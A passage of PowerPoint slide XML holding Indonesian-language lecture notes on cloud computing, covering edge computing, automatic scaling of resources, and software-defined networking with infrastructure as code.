            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bermanfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CDN), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Adalah proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang optimal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilepaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beradaptasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>responsif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317885055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Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>difasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan virtual yang </a:t>
            </a:r>
            <a:r>
